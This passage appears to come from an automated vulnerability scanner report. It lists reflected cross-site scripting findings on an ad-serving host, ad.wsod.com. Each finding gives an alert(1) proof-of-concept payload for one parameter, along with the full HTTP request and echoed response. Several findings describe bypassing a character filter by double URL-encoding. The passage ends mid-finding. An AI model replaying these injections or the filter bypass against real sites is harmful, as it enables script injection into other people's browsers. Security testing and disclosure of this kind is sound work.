The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8012'-alert(1)-'4150aa4ae71 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:00 GMT; path=/
Set-Cookie: i_1=33:1411:836:100:0:40771:1303843020:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; }
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b897'-alert(1)-'1221f18c50f was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:52 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:40771:1303843012:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:52 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 910
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; ret ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54622'-alert(1)-'002a9baae46 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:16 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:40771:1303843036:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 914
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { docum ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58bcb'-alert(1)-'b02bf13cdc7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:28 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:40771:1303843048:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 924
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b10 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a79'-alert(1)-'9ef692e406f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:24 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843044:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write( ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140d'-alert(1)-'366f24d7955 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:12 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843032:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:12 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image14 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7e5'-alert(1)-'6ddd018aaa was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:07 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:40771:1303843027:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } func ...[SNIP]...
5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f30'-alert(1)-'9293594230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:33 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:40771:1303843053:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49585"-alert(1)-"9386b35fba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92046"-alert(1)-"146c89c17b4 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79074"-alert(1)-"90cbbf22942 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40e7"-alert(1)-"cba368c8dc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f was submitted in the REST URL parameter 2. This input was echoed as 600fc";alert(1)//f3cc9aebd4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5 was submitted in the REST URL parameter 3. This input was echoed as d9bf5";alert(1)//b0a835980d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31049"-alert(1)-"aab598a9703 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=823120831049"-alert(1)-"aab598a9703&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
